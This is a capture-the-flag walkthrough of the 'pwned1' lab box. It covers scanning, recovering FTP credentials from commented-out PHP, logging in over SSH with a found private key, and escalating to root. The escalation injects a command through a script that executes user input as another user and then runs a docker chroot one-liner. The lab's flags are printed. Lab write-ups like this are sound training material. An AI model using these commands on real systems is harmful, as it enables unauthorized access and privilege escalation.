# Pre-Engagement
I started the box from Proving Grounds, and aliased its IP as `pwned1` within my `/etc/hosts` file.

# Reconnaissance
I first use `nmap` to scan some of the ports:
`nmap -T4 -oN nmap/initial pwned1`

Which reveals the following:
```
Nmap scan report for pwned1 (192.168.103.95)
Host is up (0.19s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
```

I then perform an aggressive scan on those ports:
`nmap -A -oN nmap/aggressive -p 21,22,80 pwned1`

Unfortunately, it doesn't seem to reveal much:
```
Nmap scan report for pwned1 (192.168.103.95)
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fecd90197491aef564a8a5e86f6eef7e (RSA)
|   256 813293bded9be798af2506795fde915d (ECDSA)
|_  256 dd72745d4d2da3623e81af0951e0144a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

# Vulnerability Analysis
I opened the HTTP interface in my browser, but the website too doesn't seem to have any hints. So I decided to check if there was a `robots.txt` file, as most websites do have them. And indeed there was one:
```
# Group 1

User-agent: *
Allow: /nothing
Allow: /hidden_text
```

The `/nothing` URL had nothing special going on, but the `/hidden_text` did. It contained a
`secret.dic` file which listed even more URLs. I copy-pasted them in a file, and ran `dirb` on it.

`dirb http://pwned1 wordlist.txt -o dirb/custom -w `

Here's what it showed:
```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: dirb/custom
START_TIME: Sat Mar  4 12:39:39 2023
URL_BASE: http://pwned1/
WORDLIST_FILES: wordlist.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 21

---- Scanning URL: http://pwned1/ ----
==> DIRECTORY: http://pwned1/pwned.vuln/

---- Entering directory: http://pwned1/pwned.vuln/ ----

-----------------
END_TIME: Sat Mar  4 12:39:48 2023
DOWNLOADED: 42 - FOUND: 0
```

# Exploitation
I tried the `/pwned.vuln/` directory and it had a login page. I checked its source and it had the
following code at the end:
```
<?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_Pr!ncesS') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
?>
```

By the looks of that username (`ftpuser`), the obvious place to go would be the FTP interface.
Luckily, the credentials worked and I had successfully logged into the FTP interface. I could
browse the whole file-system and look around. There was a folder named `share` in the `ftpuser`'s
home directory, and there contained a `id_rsa` file as well as a `note.txt` which hinted at the
username corresponding to the ssh user --- `ariana`. I logged in using the private key:

`ssh -i id_rsa ariana@pwned1`

And I was logged in, and got the first flag `local.txt`: `c705250a7cd964c7ffc915141cbfc424`.

# Privilege Escalation
I copied over my copy of `linpeas.sh` script over to the machine: `scp -i pwned1/id_rsa  linpeas.sh
ariana@pwned1:` and ran it. In the `Checking 'sudo -l'...` section, it showed that the user `ariana`
could run the `/home/messenger.sh` file as the `selena` user without password.

```
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh
```

The following were the contents of the `/home/messenger.sh` file:

```
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""
```

At the part where it asks for the message, we can see that the script just runs the `$msg` variable.
We can thus execute commands as the `selena` user. Running `id` showed that the user could run
docker commands. So I went to [gtfobins](https://gtfobins.github.io/) and searched for docker. There
was a section which showed that I could obtain a root shell on the system with the following
command: `docker run -v /:/mnt --rm -it alpine chroot /mnt sh`

```
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : aa

Enter message for aa :docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Sending message to aa
# ls
bin   core  etc   initrd.img      lib    lib64   lost+found  mnt  proc  run   srv  tmp  var      vmlinuz.old
boot  dev   home  initrd.img.old  lib32  libx32  media       opt  root  sbin  sys  usr  vmlinuz
# cd root
# ls
proof.txt  root.txt
```

And that's how I obtained root. The final root flag (`proof.txt`) was:
`b6ed156ba2b416ce7104ae474805db19`.
